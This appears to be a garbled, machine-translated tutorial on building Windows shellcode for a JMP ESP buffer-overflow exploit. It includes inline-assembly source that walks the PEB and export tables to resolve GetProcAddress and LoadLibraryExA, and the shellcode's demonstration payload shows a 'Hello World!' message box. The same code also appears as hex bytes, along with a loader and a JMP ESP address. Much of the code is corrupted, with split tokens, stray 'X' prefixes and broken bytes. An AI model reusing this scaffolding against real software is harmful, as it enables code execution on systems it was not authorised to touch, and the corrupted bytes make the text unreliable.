Using the JMP ESP principle there are many such directives in Windows
Find one with DBG first.
Then turn the shellcode into opcode can be tested first (code and opcode at the end)
Get some more 90 90 because some of the functions have several parameters
Run
ConsoleApplication2.cpp: Defines the entry point of the console application. #include "stdafx.h" int _tmain (int argc, _tchar* argv[]) {__asm {Pushad; Sub ESP, 0x100; JMP Tag_shellcode; [tag_next-0x52] "GetProcAddress" _asm _emit (0x47) _asm _emit (0x65) _asm _emit (0x74) _asm _emit (0x50) _asm _emit (0x72) _asm _emit (0x6f) _asm _emit (0x63) _asm _emit (0x41) _asm _emit (0x64) _asm _emit (0x64) _asm _emit (0x72) _ ASM _emit (0X65) _asm _emit (0x73) _asm _emit (0x73) _asm _emit (0x00)//[tag_next-0x44] "Loadlibraryexa\0" _asm _emit (0x4c) _asm _emit (0x6f) _asm _emit (0x61) _asm _emit (0x64) _asm _emit (0x4c) _asm _emit (0x69) _asm _emit (0x62) _asm _emit (0x72) _asm _emit (0x61) _asm _emit (0x72) _asm _emit (0x79) _asm _emit (0x45) _asm _emit (0x78) _asm _emit (0x41) _asm _emit (0x00)//[tag_next-0x35] "User32.dll\0" _asm _emit (0x55) _asm _emit (0x73) _asm _emit (0x65) _asm _emit (0x72) _asm _emit (0x33) _asm _emit (0x32) _asm _emit (0x2e) _asm _emit (0x64) _asm _emit (0x6c) _asm _emit (0x6c) _asm _emit (0x00)//[tag_next-0x2a] "Messageboxa\0" _asm _emit (0x4d) _asm _emit (0x65) _asm _emit (0x73) _asm _emit (0x73) _asm _emit (0x61) _asm _emit (0x67) _asm _em It (0x65) _asm _emit (0x42) _asm _emit (0x6f) _asm _emit (0x78) _asm _emit (0x41) _asm _emit (0x00)//[tag_next-0x 1E] "exitprocess\0" _asm _emit (0x45) _asm _emit (0x78) _asm _emit (0x69) _asm _emit (0x74) _asm _emit (0x50) _a SM _emit (0x72) _asm _emit (0x6f) _asm _emit (0x63) _asm _emit (0x65) _asm _emit (0x73) _asm _emit (0x73) _asm _emit (0x00 )//[tag_next-0x12] "Hello world!\0" _asm _emit (0x48) _asm _emit (0x65) _asm _emit (0x6c) _asm _emit (0x6c) _asm _emit (0x6f) _asm _emit (0x20) _asm _emit (0x57) _asm _emit (0x6f) _asm _emit (0x72) _asm _emit (0x6c) _asm _em It (0x64) _asm _emit (0x21) _asm _emit (0x00) Tag_shellcode:call tag_next; Tag_next: Pop ebx; Get critical module Base address mov esi, DWORD ptr fs: [0x30]; mov esi, [esi + 0x0c]; mov esi, [esi + 0x1c]; mov esi, [esi]; mov edx, [esi + 0x08]; Gets the function address of the GetProcAddress push ebx; Push edx; Call fun_getprocaddress; mov esi, eax; Gets the function address of the loadlibraryexa push edx; Lea ECX, [ebx-0x44]; push ecx; Push edx; call eax; Pop edx; Call payload partial push ebx; Push ESI; push eax; Push edx; Call Fun_payload; Fun_getprocaddress:push EBP; MOV ebp, esp; Sub ESP, 0x0c; Push edx; Get the address of eat, ENT and EOT mov edx, [ebp + 0x08]; mov esi, [edx + 0x3c]; Lea ESI, [edx + esi]; mov esi, [esi + 0x78]; Lea ESI, [edx + esi]; mov edi, [esi + 0x1c]; Lea EDI, [edx + edi]; MOV[EBP-0X04], EDI; mov edi, [esi + 0x20]; Lea EDI, [edx + edi]; MOV[EBP-0X08], EDI; mov edi, [esi + 0x24]; Lea EDI, [edx + edi]; MOV[EBP-0X0C], EDI; The cycle compares the function name in ENT with the XOR eax, eax; JMP tag_firstcmp; Tag_cmpfunnameloop:inc eax; Tag_firstcmp:mov esi, [ebp-0x08]; mov esi, [esi + 4 * EAX]; mov edx, [Ebp +0X08]; Lea ESI, [edx + esi]; mov ebx, [ebp + 0x0c]; Lea EDI, [ebx-0x53]; mov ecx, 0x0e; Cld Repe CMPSB; Jne Tag_cmpfunnameloop; Successful after finding the corresponding serial number mov esi, [ebp-0x0c]; XOR EDI, EDI; mov di, [esi + eax * 2]; Use the ordinal as the index, find the function address corresponding to the functions of the name mov edx, [ebp-0x04]; mov esi, [edx + EDI * 4]; mov edx, [ebp + 0x08]; Returns the key function that gets to the address of Lea EAX, [edx + esi]; Pop edx; mov esp, EBP; Pop ebp; RETN 0x08; Fun_payload:push EBP; MOV ebp, esp; Sub ESP, 0x08; mov ebx, [ebp + 0x14]; Get MeSsageboxa function Address Lea ecx, [ebx-0x35]; Push 0; Push 0; push ecx; CALL[EBP + 0x0c]; Lea ECX, [ebx-0x2a]; push ecx; push eax; CALL[EBP + 0x10]; MOV[EBP-0X04], eax; Get the function address of ExitProcess lea ECX, [ebx-0x1e]; push ecx; PUSH[EBP + 0x08]; CALL[EBP + 0x10]; MOV[EBP-0X08], eax; Show Lea ECX, [ebx-0x12]; Push 0; push ecx; push ecx; Push 0; CALL[EBP-0X04]; Push 0; CALL[EBP-0X08]; mov esp, EBP; Pop ebp; RETN 0x10; } return 0;}
#include "stdafx.h" int _tmain (int argc, _tchar* argv[]) {char bshellcode[] = {"\x60\x81\xec\x00\x01\x00\x00\xeb\x4e\x4 7\x65\x74\x50\x72\x6f\x63\x41\x64\x64\x72\x65\x73\x73\x00\x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x45\x78\ X41\x00\x55\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x00\x45\x78\ X69\x74\x50\x72\x6f\x63\x65\x73\x73\x00\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x00\xe8\x00\x00\x00\ X00\x5b\x64\x8b\x35\x30\x00\x00\x00\x8b\x76\x0c\x8b\x76\x1c\x8b\x36\x8b\x56\x08\x53\x52\xe8\x14\x00\x00\x00\ X8b\xf0\x52\x8d\x4b\xbc\x51\x52\xff\xd0\x5a\x53\x56\x50\x52\xe8\x6e\x00\x00\x00\x55\x8b\xec\x83\xec\x0c\x52\ X8b\x55\x08\x8b\x72\x3c\x8d\x34\x32\x8b\x76\x78\x8d\x34\x32\x8b\x7e\x1c\x8d\x3c\x3a\x89\x7d\xfc\x8b\x7e\x20\ X8d\x3c\x3a\x89\x7d\xf8\x8b\x7e\x24\x8d\x3c\x3a\x89\x7d\xf4\x33\xc0\xeb\x01\x40\x8b\x75\xf8\x8b\x34\x86\x8b\ X55\x08\x8d\x34\x32\x8b\x5d\x0c\x8d\x7b\xad\xb9\x0e\x00\x00\x00\xfc\xf3\xa6\x75\xe3\x8b\x75\xf4\x33\xff\x66\ X8b\x3c\x46\X8b\x55\xfc\x8b\x34\xba\x8b\x55\x08\x8d\x04\x32\x5a\x8b\xe5\x5d\xc2\x08\x00\x55\x8b\xec\x83\xec\x08\x8b\x5d\ X14\x8d\x4b\xcb\x6a\x00\x6a\x00\x51\xff\x55\x0c\x8d\x4b\xd6\x51\x50\xff\x55\x10\x89\x45\xfc\x8d\x4b\xe2\x51\ Xff\x75\x08\xff\x55\x10\x89\x45\xf8\x8d\x4b\xee\x6a\x00\x51\x51\x6a\x00\xff\x55\xfc\x6a\x00\xff\x55\xf8\x8b\ Xe5\x5d\xc2 "}; __asm {lea eax, Bshellcode; push eax; RET} return 0;}
"\x60\x81\xec\x00\x01\x00\x00\xeb\x4e\x47\x65\x74\x50\x72\x6f\x63\x41\x64\x64\x72\x65\x73\x73\x00\x4c\x6f\x61\ X64\x4c\x69\x62\x72\x61\x72\x79\x45\x78\x41\x00\x55\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00\x4d\x65\x73\x73\ X61\x67\x65\x42\x6f\x78\x41\x00\x45\x78\x69\x74\x50\x72\x6f\x63\x65\x73\x73\x00\x48\x65\x6c\x6c\x6f\x20\x57\ X6f\x72\x6c\x64\x21\x00\xe8\x00\x00\x00\x00\x5b\x64\x8b\x35\x30\x00\x00\x00\x8b\x76\x0c\x8b\x76\x1c\x8b\x36\ X8b\x56\x08\x53\x52\xe8\x14\x00\x00\x00\x8b\xf0\x52\x8d\x4b\xbc\x51\x52\xff\xd0\x5a\x53\x56\x50\x52\xe8\x6e\ X00\x00\x00\x55\x8b\xec\x83\xec\x0c\x52\x8b\x55\x08\x8b\x72\x3c\x8d\x34\x32\x8b\x76\x78\x8d\x34\x32\x8b\x7e\ X1c\x8d\x3c\x3a\x89\x7d\xfc\x8b\x7e\x20\x8d\x3c\x3a\x89\x7d\xf8\x8b\x7e\x24\x8d\x3c\x3a\x89\x7d\xf4\x33\xc0\ Xeb\x01\x40\x8b\x75\xf8\x8b\x34\x86\x8b\x55\x08\x8d\x34\x32\x8b\x5d\x0c\x8d\x7b\xad\xb9\x0e\x00\x00\x00\xfc\ Xf3\xa6\x75\xe3\x8b\x75\xf4\x33\xff\x66\x8b\x3c\x46\x8b\x55\xfc\x8b\x34\xba\x8b\x55\x08\x8d\x04\x32\x5a\x8b\ xe5\x5d\xc2\x08\x00\x55\x8B\xec\x83\xec\x08\x8b\x5d\x14\x8d\x4b\xcb\x6a\x00\x6a\x00\x51\xff\x55\x0c\x8d\x4b\xd6\x51\x50\xff\x55\x10\x89\ X45\xfc\x8d\x4b\xe2\x51\xff\x75\x08\xff\x55\x10\x89\x45\xf8\x8d\x4b\xee\x6a\x00\x51\x51\x6a\x00\xff\x55\xfc\ X6a\x00\xff\x55\xf8\x8b\xe5\x5d\xc2 "77460a9b jmp ESP Address {0x60, 0x81, 0xEC, 0x00, 0x01, 0x00, 0x00, 0xEB, 0x4E, 0x47, 0x65, 0x74, 0x50, 0x72, 0x6F, 0x63,0x41, 0x64, 0x64, 0x72, 0x65, 0x73, 0x73, 0x00, 0x4C, 0x6F, 0x61, 0x64, 0x4C, 0x69, 0x62, 0x 72,0x61, 0x72, 0x79, 0x45, 0x78, 0x41, 0x00, 0x55, 0x73, 0x65, 0x72, 0x33, 0x32, 0x2e, 0x64, 0x6c,0x6c, 0x00, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x42, 0x6F, 0x78, 0x41, 0x00, 0x45, 0x78,0x69, 0x74, 0x50, 0x72, 0x6F, 0x63, 0x65, 0x73, 0x7 3, 0x00, 0x48, 0x65, 0x6c, 0x6c, 0x6F, 0x20,0x57, 0x6F, 0x72, 0x6c, 0x64, 0x21, 0x00, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x5b, 0x64, 0x8b, 0x35,0x30, 0x00, 0x00, 0x00, 0x8b, 0x76, 0x0C, 0x8b, 0x76, 0x1C, 0x8b, 0x36, 0x8b, 0x56, 0x08, 0x53,0x52, 0xe8 , 0x14, 0x00, 0x00, 0x00, 0x8b, 0xF0, 0x52, 0x8d,0x4B, 0xBC, 0x51, 0x52, 0xFF, 0xd0,0x5a, 0x53, 0x56, 0x50, 0x52, 0xe8, 0x6e, 0x00, 0x00, 0x00, 0x55, 0x8b, 0xEC, 0x83, 0xE C, 0x0c,0x52, 0x8b, 0x55, 0x08, 0x8b, 0x72, 0x3C, 0x8d, 0x34, 0x32, 0x8b, 0x76, 0x78, 0x8d, 0x34, 0x32,0x8b, 0x7E, 0x1C, 0 x8d, 0x3C, 0x3A, 0x89, 0x7d, 0xFC, 0x8b, 0x7E, 0x20, 0x8d, 0x3C, 0x3A, 0x89,0x7d, 0xF8, 0x8b, 0x7E, 0x24, 0x8d, 0x3C, 0x3A , 0x89, 0x7d, 0xf4, 0x33, 0xC0, 0xEB, 0x01, 0x40,0x8b, 0x75, 0xF8, 0x8b, 0x34, 0x86, 0x8b, 0x55, 0x08, 0x8d, 0x34, 0x32, 0 x8b, 0x5d, 0x0C, 0x8d,0x7b, 0xAD, 0xb9, 0x0E, 0x00, 0x00, 0x00, 0xFC, 0xf3, 0xa6, 0x75, 0xe3, 0x8b, 0x75, 0xf4, 0x33,0xff, 0x66, 0x8b, 0x3C, 0x46, 0x8b, 0x55, 0xFC, 0x8b, 0x34, 0xBA, 0x8b, 0x55, 0x08, 0x8d, 0x04,0x32, 0x5A, 0x8b, 0xe5, 0x5d, 0x C2, 0x08, 0x00, 0x55, 0x8b, 0xEC, 0x83, 0xEC, 0x08, 0x8b, 0x5d,0x14, 0x8d, 0x4B, 0xCB, 0x6A, 0x00, 0x6A, 0x00, 0x51, 0xFF, 0x55, 0x0C, 0x8d, 0x4B, 0xd6, 0x51,0x50, 0xFF, 0x55, 0x10, 0x89, 0x45, 0xFC, 0x8d, 0x4B, 0xe2, 0x51, 0xFF, 0x75, 0x08, 0x FF, 0x55,0x10, 0x89, 0x45, 0xF8, 0x8d, 0x4B, 0xEE, 0x6A, 0x00, 0x51, 0x51, 0x6A, 0x00, 0xFF, 0x55, 0xfc,0x6a, 0x00, 0xFF, 0x55, 0xF8, 0x8b, 0xe5, 0X5D, 0xC2};
Making cross-platform Shellcode